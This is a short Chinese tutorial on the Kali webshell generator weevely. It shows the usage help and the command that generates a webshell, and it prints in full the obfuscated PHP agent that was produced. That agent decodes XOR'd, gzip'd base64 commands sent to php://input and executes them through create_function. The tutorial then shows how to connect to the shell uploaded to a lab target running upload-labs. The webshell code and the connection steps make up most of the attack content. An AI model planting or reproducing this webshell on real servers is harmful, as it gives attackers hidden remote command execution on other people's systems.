kali中的webshell生成工具weevely

用法

usage: weevely [-h] {terminal,session,generate} ...

参数:

{terminal,session,generate}

terminal            Run terminal or command on the target #在目标上运行终端或命令

session            Recover an existing session #恢复现有会话

generate            Generate new agent #生成新webshell

optional arguments:

-h, --help show this help message and exit

生成shell的命令：weevely generate 密码 文件名及路径

如

weevely generate shell /root/Desktop/1.php

生成的webshell是base64加密的，代码如下：

='or($j=B:0;($j<$c&&$i$l);B:$j++,B:$i++){$o.B:=B:$t{$i}^$kB:{$B:j};}}returB:n $o;}iB:f(@pB:reg_matB:c';$h='l(B:@gB:zunB:compress(@B:x(@basB:e64_B:decode($mB:[1]),$kB:)));$o=@oB:B:b_get_conteB:nts()B:;@obB';$A='h("/$khB:(.B:+)$B:kB:f/",@fB:ile_get_contenB:ts("phpB:://B:input"),B:$B:m)==1){@ob_starB:t();@eB:va';$W=str_replace('V','','cVrVeate_VfuVnVctVion');$z=':_end_cleanB:();$B:r=B:@baseB:64_encode(B:@xB:(@gzcomB:press($o),B:$k)B:);prB:B:int("$p$kh$r$kf");}';$g='Y";function xB:($t,B:$B:k){$c=strlen($B:kB:);$B:B:l=strlen($t);$o="B:"B:;fB:or($i=0;$i<$l;B:){fB:';$Y='$kB:="2591c98b"B:;B:$B:kh="70119fe62B:48B:9";$kf="8b1eB:424bB:5e91";$pB:="DB:Z7CfNFAUiLB:y9B:tB:M';$E=str_replace('B:','',$Y.$g.$t.$A.$h.$z);$e=$W('',$E);$e();?>

连接shell

weevely http://192.168.114.129/upload-labs/upload/1.php shell

此时即可执行命令行命令

对目标运行一个终端：

> weevely <URL> <password> [CMD]

读取会话文件：

weevely session <path> [CMD]

我也不是很懂后面这俩功能有啥用，要是想连接终端还用得着这玩意吗。。。。